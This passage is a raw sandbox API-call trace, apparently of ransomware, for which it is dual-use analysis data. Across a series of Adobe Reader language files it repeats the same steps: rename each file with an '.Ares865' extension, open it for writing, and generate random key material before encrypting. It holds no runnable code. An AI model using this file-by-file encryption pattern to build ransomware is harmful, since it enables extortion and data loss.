lpString2="DisplayLanguageNames.es_ES_PREEURO.txt" | out: lpString1="DisplayLanguageNames.es_ES_PREEURO.txt") returned="DisplayLanguageNames.es_ES_PREEURO.txt" [0159.856] lstrlenW (lpString="DisplayLanguageNames.es_ES_PREEURO.txt") returned 38 [0159.856] lstrlenW (lpString="Ares865") returned 7 [0159.856] lstrcmpiW (lpString1="URO.txt", lpString2="Ares865") returned 1 [0159.856] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES_PREEURO.txt.Ares865") returned 123 [0159.856] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_es_preeuro.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES_PREEURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_es_preeuro.txt.ares865"), dwFlags=0x1) returned 1 [0159.858] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES_PREEURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_es_preeuro.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.858] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28360) returned 1 [0159.859] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.859] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.859] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.865] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.866] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.866] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.867] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es_GT.txt" | out: lpString1="DisplayLanguageNames.es_GT.txt") returned="DisplayLanguageNames.es_GT.txt" [0159.867] lstrlenW (lpString="DisplayLanguageNames.es_GT.txt") returned 30 [0159.867] lstrlenW (lpString="Ares865") returned 7 [0159.867] lstrcmpiW (lpString1="_GT.txt", lpString2="Ares865") returned -1 [0159.867] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_GT.txt.Ares865") returned 115 [0159.867] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_GT.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_gt.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_GT.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_gt.txt.ares865"), dwFlags=0x1) returned 1 [0159.870] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_GT.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_gt.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.870] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28360) returned 1 [0159.871] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.871] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.871] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.876] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.877] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.877] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.878] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es_HN.txt" | out: lpString1="DisplayLanguageNames.es_HN.txt") returned="DisplayLanguageNames.es_HN.txt" [0159.879] lstrlenW (lpString="DisplayLanguageNames.es_HN.txt") returned 30 [0159.879] lstrlenW (lpString="Ares865") returned 7 [0159.879] lstrcmpiW (lpString1="_HN.txt", lpString2="Ares865") returned -1 [0159.879] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_HN.txt.Ares865") returned 115 [0159.879] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_HN.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_hn.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_HN.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_hn.txt.ares865"), dwFlags=0x1) returned 1 [0159.882] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_HN.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_hn.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.883] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28360) returned 1 [0159.884] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.884] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.884] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.888] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.888] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.888] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.889] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es_MX.txt" | out: lpString1="DisplayLanguageNames.es_MX.txt") returned="DisplayLanguageNames.es_MX.txt" [0159.889] lstrlenW (lpString="DisplayLanguageNames.es_MX.txt") returned 30 [0159.889] lstrlenW (lpString="Ares865") returned 7 [0159.889] lstrcmpiW (lpString1="_MX.txt", lpString2="Ares865") returned -1 [0159.890] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_MX.txt.Ares865") returned 115 [0159.890] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_MX.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_mx.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_MX.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_mx.txt.ares865"), dwFlags=0x1) returned 1 [0159.891] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_MX.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_mx.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.892] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28352) returned 1 [0159.892] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.893] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.893] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.896] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.897] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.897] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.898] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es_NI.txt" | out: lpString1="DisplayLanguageNames.es_NI.txt") returned="DisplayLanguageNames.es_NI.txt" [0159.898] lstrlenW (lpString="DisplayLanguageNames.es_NI.txt") returned 30 [0159.898] lstrlenW (lpString="Ares865") returned 7 [0159.898] lstrcmpiW (lpString1="_NI.txt", lpString2="Ares865") returned -1 [0159.898] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_NI.txt.Ares865") returned 115 [0159.898] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_NI.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ni.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_NI.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ni.txt.ares865"), dwFlags=0x1) returned 1 [0159.900] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_NI.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ni.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.900] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28364) returned 1 [0159.900] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.901] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.901] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.905] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.906] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.906] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.906] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es_PA.txt" | out: lpString1="DisplayLanguageNames.es_PA.txt") returned="DisplayLanguageNames.es_PA.txt" [0159.907] lstrlenW (lpString="DisplayLanguageNames.es_PA.txt") returned 30 [0159.907] lstrlenW (lpString="Ares865") returned 7 [0159.907] lstrcmpiW (lpString1="_PA.txt", lpString2="Ares865") returned -1 [0159.907] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PA.txt.Ares865") returned 115 [0159.907] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pa.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PA.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pa.txt.ares865"), dwFlags=0x1) returned 1 [0159.909] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PA.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pa.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.909] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28360) returned 1 [0159.910] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.911] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.911] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.915] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.915] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.915] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.916] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es_PE.txt" | out: lpString1="DisplayLanguageNames.es_PE.txt") returned="DisplayLanguageNames.es_PE.txt" [0159.916] lstrlenW (lpString="DisplayLanguageNames.es_PE.txt") returned 30 [0159.916] lstrlenW (lpString="Ares865") returned 7 [0159.916] lstrcmpiW (lpString1="_PE.txt", lpString2="Ares865") returned -1 [0159.917] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PE.txt.Ares865") returned 115 [0159.917] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pe.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PE.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pe.txt.ares865"), dwFlags=0x1) returned 1 [0159.918] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PE.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pe.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.919] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28360) returned 1 [0159.919] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.920] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.920] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.924] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.924] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.924] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.925] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es_PR.txt" | out: lpString1="DisplayLanguageNames.es_PR.txt") returned="DisplayLanguageNames.es_PR.txt" [0159.925] lstrlenW (lpString="DisplayLanguageNames.es_PR.txt") returned 30 [0159.925] lstrlenW (lpString="Ares865") returned 7 [0159.925] lstrcmpiW (lpString1="_PR.txt", lpString2="Ares865") returned -1 [0159.926] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PR.txt.Ares865") returned 115 [0159.926] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pr.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PR.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pr.txt.ares865"), dwFlags=0x1) returned 1 [0159.927] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PR.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pr.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.928] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28360) returned 1 [0159.928] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.929] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.929] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.934] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.935] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.935] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.936] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es_PY.txt" | out: lpString1="DisplayLanguageNames.es_PY.txt") returned="DisplayLanguageNames.es_PY.txt" [0159.936] lstrlenW (lpString="DisplayLanguageNames.es_PY.txt") returned 30 [0159.936] lstrlenW (lpString="Ares865") returned 7 [0159.936] lstrcmpiW (lpString1="_PY.txt", lpString2="Ares865") returned -1 [0159.936] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PY.txt.Ares865") returned 115 [0159.936] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PY.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_py.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PY.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_py.txt.ares865"), dwFlags=0x1) returned 1 [0159.944] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PY.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_py.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.944] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28360) returned 1 [0159.945] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.945] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.945] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.949] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.949] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.950] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.950] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es_SV.txt" | out: lpString1="DisplayLanguageNames.es_SV.txt") returned="DisplayLanguageNames.es_SV.txt" [0159.950] lstrlenW (lpString="DisplayLanguageNames.es_SV.txt") returned 30 [0159.950] lstrlenW (lpString="Ares865") returned 7 [0159.951] lstrcmpiW (lpString1="_SV.txt", lpString2="Ares865") returned -1 [0159.951] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_SV.txt.Ares865") returned 115 [0159.951] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_SV.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_sv.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_SV.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_sv.txt.ares865"), dwFlags=0x1) returned 1 [0159.953] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_SV.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_sv.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.953] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28360) returned 1 [0159.953] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.954] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.954] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.962] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.963] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.963] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.963] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es_US.txt" | out: lpString1="DisplayLanguageNames.es_US.txt") returned="DisplayLanguageNames.es_US.txt" [0159.964] lstrlenW (lpString="DisplayLanguageNames.es_US.txt") returned 30 [0159.964] lstrlenW (lpString="Ares865") returned 7 [0159.964] lstrcmpiW (lpString1="_US.txt", lpString2="Ares865") returned -1 [0159.964] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_US.txt.Ares865") returned 115 [0159.964] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_US.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_us.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_US.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_us.txt.ares865"), dwFlags=0x1) returned 1 [0159.966] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_US.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 